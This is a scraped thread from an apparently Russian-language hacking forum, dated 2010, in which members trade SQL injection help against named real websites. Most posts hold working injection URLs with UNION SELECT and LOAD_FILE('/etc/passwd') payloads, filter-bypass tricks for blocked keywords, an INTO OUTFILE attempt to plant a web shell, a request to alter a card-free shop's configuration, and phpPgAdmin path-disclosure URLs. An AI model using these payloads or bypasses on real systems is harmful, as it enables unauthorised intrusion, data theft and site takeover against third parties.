Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15
    ггг, сенкю
     
  2. Fak1r

    Fak1r Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0
    А можно ли че нить сделать с этим http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=17416'
     
  3. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15
    _http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=-17416'+UNION+SELECT+1,USER(),VERSION(),4,DATABASE(),6,7,8,9,10+--+
     
    1 person likes this.
  4. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    http://www.besedin.com/zerkalo/foto.php?id=-6075%27+union+select+1,LOAD_FILE%28%27/etc/passwd%27%29,3,4,5+from+mysql.user--+

    не могу найти пути

    Помогите плз
     
  5. Aels

    Aels New Member

    Joined:
    29 Jun 2010
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    День добрый, есть линк
    отлично работает. нужно проапдейтить ConfigValue, update после юниона не канает
    можно ли сделать что-то вроде
    как быть?
    *линк пмну, это бескартонный шоп, но нужен =__=
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    нельзя
     
    1 person likes this.
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ищи в конфигах путь
    клац
     
    3 people like this.
  8. hacker-nubik

    hacker-nubik New Member

    Joined:
    20 Apr 2010
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Есть SQL-INJ
    PHP:
    and ExtractValue(1,concat(0x5c,(select version())))--+
    фильтруются слова union|where|table_name|user|column_name|, самое главное это table_name, какими способами возможно обойти фильтр на слово table_name, ибо узнать таблицу с админа не как не удается..
    делал
    PHP:
    and ExtractValue(1,concat(0x5c,(select unhex(0x7461626C655F6E616D65from information_schema.tables limit 16,1)))--+
    результата не дало..
     
    #13948 hacker-nubik, 4 Jul 2010
    Last edited: 4 Jul 2010
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    С регистром играться не пробовал?
     
  10. hacker-nubik

    hacker-nubik New Member

    Joined:
    20 Apr 2010
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    пробовал )
     
  11. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Попробуй tatable_nameble_name
     
    3 people like this.
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Возможно ли здесь обойти фильтрацию select?
    Code:
    
    http://www.bestbets.org/bets/bet.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+--+
    
    
     
    #13952 FlaktW, 4 Jul 2010
    Last edited: 4 Jul 2010
  13. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Помогите разобраться с этим постом
    https://forum.antichat.ru/showpost.php?p=1304326&postcount=93
    Не могу понять одного ...
    Code:
    id=1+and+1=if(load_file('/etc/passwd')+is+not+NULL,1,2)--+
    
    Что значит +is+not+NULL,1,2 и зависит ли такой запрос от кол-во колонок ?
    И где можно почитать про под запросы?
     
    #13953 SeNaP, 4 Jul 2010
    Last edited: 4 Jul 2010
  14. pento

    pento Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    126
    Likes Received:
    24
    Reputations:
    -1
    Если привелегия file_priv есть, то тогда
    Code:
    if(load_file('/etc/passwd')+is+not+NULL,1,2)
    
    превратится в 1 и финальный запрос будет выглядить как
    ...
    Code:
    id=1+and+1=1--+
    
    то есть условие будет верно. В противном случае будет 2 и условие не сработает, то есть
    Code:
    id=1+and+1=2--+
    
     
    1 person likes this.
  15. Алкорайдер

    Joined:
    3 Jun 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Подскажите как можно залить шелл через такой инклуд?

    PHP:
    <?php

    // get variables

    $fn=explode('/',$_GET["path"]);

    $saveName stripslashes($fn[0]);
    $savePath stripslashes($_GET["path"]);

    // send headers to initiate a binary download

    header("Content-Type: application/pdf");
    header("Content-Disposition: attachment; filename=$saveName");
    header("Content-Transfer-Encoding: binary");
    header("Content-length: " filesize($savePath));

    // read file

    readfile($savePath);

    ?>
     
  16. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Алкорайдер, где ты там инкуд увидел?
    UPD:

    Вроде справился с двойным запросом при заливки шелла, файл создается, но вот только почему то с содержанием 1 или 0
    Если select 'test' то пишется в файл 0
    Если select 123 то пишется в файл 1

    сам запрос выглядит так

    select COUNT(CODE) as count1 from tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE']

    Делаю так
    53 and if((select 123 into outfile '/tmp/test7.txt'),53,54)=53

    :confused:
     
    #13956 SeNaP, 4 Jul 2010
    Last edited: 4 Jul 2010
  17. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Можно только произвольные файлы читать, не более.
     
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    как обойти эту хрень?
    http://www.salesbearing.com/admin/
     
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Подскажите, какие уязвимости есть в phpPgAdmin 4.2.2 (PHP 4.4.9).
    Можно ли как нибудь авторизироватся? И вообще можно ли залить шелл через нее?
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    раскрытие путей:

    http://site.com/phpPgAdmin/sqledit.php?server[]=%3A5432%3Aallow&action=sql
    http://site.com/phpPgAdmin/libraries/lib.inc.php
     
Thread Status:
Not open for further replies.